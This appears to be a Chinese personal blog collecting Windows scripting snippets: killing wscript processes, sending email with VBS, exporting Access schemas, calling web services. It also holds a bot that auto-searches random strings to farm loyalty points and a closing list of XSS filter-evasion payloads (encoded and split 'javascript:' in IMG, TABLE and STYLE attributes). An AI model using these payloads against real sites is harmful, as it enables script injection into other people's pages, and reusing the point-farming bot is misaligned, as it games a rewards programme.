用批处理命令杀脚本进程

VBS的进程是wscript.exe。批处理的注释符号为“: ”或“REM ”。

: 方法1
taskkill /f /im wscript.exe

: 方法2
createobject(“wscript.shell”).run “cmd /c taskkill /f /im wscript.exe”,0,true
: 最后的0表示隐藏cmd窗口。若为1,则用cmd /c 运行程序时会闪现黑色的DOS窗口。
: 最后的true表示等待命令运行结束并返回,然后才会执行后面的命令。

: 方法3
ntsd -c q -pn wscript.exe

: 方法4
createobject(“wscript.shell”).run “cmd /c ntsd -c q -pn wscript.exe”,0,true

双击bat文件运行,结果悲催地发现无效。同样的命令在终端执行有效。百思不得其解。即便在bat文件末尾加上pause,终端窗口仍然一闪而过。于是按照以下方法,让终端窗口保持打开。

对应bat文件打开行为:编辑注册表HKEY_CLASSES_ROOT\batfile\shell\open\command,将默认值修改为以下。
“%1” %* & pause

对应以管理员身份运行bat文件行为:编辑注册表HKEY_CLASSES_ROOT\batfile\shell\runas\command ,将默认值修改为以下。
%SystemRoot%\System32\cmd.exe /C “%1” %* & pause

看到终端报错,说无法识别盘符(脚本里本不含盘符)。原来是bat文件默认保存成了Unicode格式,终端无法执行。改成ANSI格式即可。

Advertisements

一行代码抓取网页里所有链接

有达人写了一句脚本。(原帖地址:http://blog.csdn.net/kingwolf_javascript/article/details/11620085)
document.body.innerHTML.match(/http:\/\/[^\s]*\b/g);

好了,那么稍微改动一下正则表达式,抓取磁力链接,在浏览器的终端运行吧。
document.body.innerHTML.match(/magnet:[^\s]*\b/g);

这又是一句顶一万句啊。

用VBS发Email

GMail不知为何没有通过。

  • Gmail SMTP server address: smtp.gmail.com
  • Gmail SMTP user name: Your full Gmail address (e.g. example@gmail.com)
  • Gmail SMTP password: Your Gmail password
  • Gmail SMTP port: 465
  • Gmail SMTP TLS/SSL required: yes

以下用163为例,测试通过。

NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
Set Email = CreateObject("CDO.Message")
Email.From = "sender@163.com"
Email.To = "receiver@anyone.com"
Email.Subject = "Hello_" + cstr(now())
Email.Textbody = "Done."
'Email.AddAttachment "D:\a.jpg"
With Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2 'CDO port
.Item(NameSpace&"smtpserver") = "smtp.163.com" 'SMTP server
.Item(NameSpace&"smtpserverport") = 25 'SMTP port
'.Item(NameSpace&"smtpusessl") = true 'SMTP SSL enabled
.Item(NameSpace&"smtpauthenticate") = 1 'BASIC authenticate
.Item(NameSpace&"sendusername") = "sender@163.com" 'sender
.Item(NameSpace&"sendpassword") = "xxxxxx" 'sender
.Update
End With
Email.Send


' How to call in another VBS
'Dim objShell
'Set objShell = Wscript.CreateObject("WScript.Shell")
'objShell.Run "email.vbs"
'Set objShell = Nothing

从flybuy自动赚五毛

话说扣死家与窝窝死家在澳村大搞价格战。扣死家搞出了一个雅虎工具条。一个月用这个工具条搜索200次(最多),可得flybuy积分100分。根据目前的折算率,2000flybuy积分=10刀。100分则相当于5毛(50澳分)。100积分平时要花100刀购物(不算奖励积分)才能积得。所以没事一个月搜索个两百下也算是聊胜于无吧。

在网上找按键精灵之类的按键模拟程序,好不容易找到一个。
什么,ANSI版的,英文系统上运行是乱码?你行的,直接上M$ AppLocal。
什么,要注册,原价800大洋,折后600?你行的,我先试用一下。。。
什么,试用版有次数限制?而且不能模拟随机字符串输入??。。。。。。

好吧,自己动手丰衣足食。在网上拼拼凑凑,弄成了如下脚本,可以每五秒自动在雅虎工具条输入搜索一个随机四位数字字母串。经试验,四位是最短可接受的关键字长度了。让脚本飞一会,坐等5毛到账。

另外,这就是所谓的,真正的“自干五”?Lol


Dim StrA, i, Sh, Time
StrA = "abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"
Set Sh = CreateObject("WScript.Shell")
Time = 5

Function MakeStr(L)
    Dim i
    MakeStr = ""
    For i = 1 To L
        Randomize
        MakeStr = MakeStr & Mid(StrA, Int(Rnd() * Len(StrA)) + 1, 1)
    Next
End Function

Sub Main()
    wscript.sleep(2000)

    For i = 1 To Time
        wscript.sleep(1000)
        Sh.Run "mouse.exe m,2070,75"
        wscript.sleep(1000)
        Sh.Run "mouse.exe l"
        wscript.sleep(1000)
        'Sh.SendKeys "^{a}"
        'wscript.sleep(1000)
        'Sh.SendKeys "{DELETE}"
        'wscript.sleep(1000)
        Sh.SendKeys MakeStr(4)
        wscript.sleep(1000)
        Sh.SendKeys "{ENTER}"
        wscript.sleep(1000)
    Next

End Sub

Main

用VBS将Access数据库表结构转SQL语句


Sub Class1()
    Dim db As Database
    Dim tdf As TableDef
    Dim fld As DAO.Field
    Dim ndx As DAO.Index
    Dim strSQL As String
    Dim strFlds As String
    Dim strCn As String

    Dim fs, f

    Set db = CurrentDb

    Set fs = CreateObject("Scripting.FileSystemObject")
    Set f = fs.CreateTextFile("D:Schema.txt")

    For Each tdf In db.TableDefs
        If Left(tdf.Name, 4)  "Msys" Then
            strSQL = "CREATE TABLE [" & tdf.Name & "] ("

            strFlds = ""

            For Each fld In tdf.Fields

                strFlds = strFlds & ",[" & fld.Name & "] "

                Select Case fld.Type

                    Case dbText
                        'No look-up fields
                        strFlds = strFlds & "varchar(" & fld.Size & ")"

                    Case dbLong
                        If (fld.Attributes And dbAutoIncrField) = 0& Then
                            strFlds = strFlds & "integer"
                        Else
                            strFlds = strFlds & "integer"
                        End If

                    Case dbBoolean
                        strFlds = strFlds & "bit"

                    Case dbByte
                        strFlds = strFlds & "byte"

                    Case dbInteger
                        strFlds = strFlds & "integer"

                    Case dbCurrency
                        strFlds = strFlds & "decimal"

                    Case dbSingle
                        strFlds = strFlds & "float"

                    Case dbDouble
                        strFlds = strFlds & "float"

                    Case dbDate
                        strFlds = strFlds & "datetime"

                    Case dbBinary
                        strFlds = strFlds & "image"

                    Case dbLongBinary
                        strFlds = strFlds & "image"

                    Case dbMemo
                        If (fld.Attributes And dbHyperlinkField) = 0& Then
                            strFlds = strFlds & "text"
                        Else
                            strFlds = strFlds & "hyperlink"
                        End If

                    Case dbGUID
                        strFlds = strFlds & "uniqueidentifier"

                End Select

            Next

            strSQL = strSQL & Mid(strFlds, 2) & ")"
            f.WriteLine vbCrLf & strSQL

            'Indexes
            For Each ndx In tdf.Indexes
                Exit For

                If ndx.Unique Then
                    strSQL = "strSQL=""CREATE UNIQUE INDEX "
                Else
                    strSQL = "strSQL=""CREATE INDEX "
                End If

                strSQL = strSQL & "[" & ndx.Name & "] ON [" & tdf.Name & "] ("

                strFlds = ""

                For Each fld In tdf.Fields
                    strFlds = ",[" & fld.Name & "]"
                Next

                strSQL = strSQL & Mid(strFlds, 2) & ") "

                strCn = ""

                If ndx.Primary Then
                    strCn = " PRIMARY"
                End If

                If ndx.Required Then
                    strCn = strCn & " DISALLOW NULL"
                End If

                If ndx.IgnoreNulls Then
                    strCn = strCn & " IGNORE NULL"
                End If

                If Trim(strCn)  vbNullString Then
                    strSQL = strSQL & " WITH" & strCn & " "
                End If

                f.WriteLine vbCrLf & strSQL & """" & vbCrLf & "Currentdb.Execute strSQL"
            Next
        End If
    Next

    f.Close
End Sub

 

VBS调用Web Service

简单类型调用soapsdk:


dim oSoap
set oSoap = createobject("MSSOAP.SOAPClient30")
on error resume next
oSoap.mssoapinit("http://www.MyService.com/MyService/MyService.asmx?wsdl")
if err then
    wscript.echo oSoap.faultString
    wscript.echo oSoap.detail
end if
wscript.echo oSoap.getServerDateTime()‘括号里可以放web service的参数,用逗号分隔,或用一个xml字符串
if err then
    wscript.echo oSoap.faultString
    wscript.echo oSoap.detail
end if
set oSoap = nothing
wscript.sleep 5000

复杂类型直接发送Post:


data="<?xml version=""1.0"" encoding=""utf-8""?>"&_
"<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/"">"&_
"  <soap:Body>"&_
"    <BPAM_getUserClientDataList xmlns=""http://tempuri.org/"">"&_
"      <myUserID>7354</myUserID>"&_
"    </BPAM_getUserClientDataList>"&_
"  </soap:Body>"&_
"</soap:Envelope>"
on error resume next
Set oHttp = CreateObject("MSXML2.XMLHTTP")
oHttp.Open "POST", "http://www.MyService.com.au/MyService/MyService.asmx", False
oHttp.SetRequestHeader "Host", "www.MyService.com.au"
oHttp.SetRequestHeader "Content-Type", "text/xml; charset=utf-8"
oHttp.setRequestHeader "Content-Length", len(data)
oHttp.SetRequestHeader "SOAPAction", "http://tempuri.org/BPAM_getUserClientDataList"
oHttp.Send(data)
wscript.echo "Text: " & oHttp.responseText
wscript.echo "XML: " & oHttp.responseXML
'再用Microsoft.XMLDOM对象解析XML
set oHttp = nothing
wscript.sleep 5000

避开空间对脚本过滤的例子

文章来源:避开空间对脚本过滤的例子
http://info.7fnet.com/Document/132/2008-03-D828CE65ECA34B47.html

首先是Monyer的办法,利用IMG标签SRC属性嵌入脚本。这种办法公开已经有几天时间了,目前还没有被封:
(1) <IMG SRC=javascript:alert(”XSS”);>

如果你是vbs爱好者,也可以这样用:
(2) <IMG SRC=”vbscript:msgbox(XSS)”>

如果过滤了SRC里面的javascript,vbscript,可以尝试在关键字中间嵌入white space字符逃避过滤:
(3) <IMG SRC=jav ascript:alert(”XSS”); >
(4) <IMG SRC=jav ascript:alert(”XSS”); >
(5) <IMG SRC=jav ascript:alert(”XSS”); >

如果再把white space字符都过滤的话,可以用多种形式的转义编码来逃避过滤(其中&#[字符十进制编码值]和&#x[十六进制编码值]是常用的转义编码方式。):
(6) <IMG SRC=javascript
:alert('XSS')>
(7) <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114
&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114
&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
(8) <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65
&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

除了IMG可以利用,TABLE和TD标签也可以用来嵌入脚本:
(9) <TABLE BACKGROUND=javascript:alert(”XSS”)>
(10) <TABLE><TD BACKGROUND=javascript:alert(”XSS”)>

已经过滤了STYLE属性里面的javascript等关键字,但编码后可以逃避过滤:
(11) <DIV STYLE=background-image:07507206C02806A06107606107306307206907007403A06106C065072074028027058053053027029029>

在关键字中间嵌入注释字串,可以逃避过滤:
(12) <IMG STYLE=xss:expr/*XSS*/ession(alert(”XSS”))>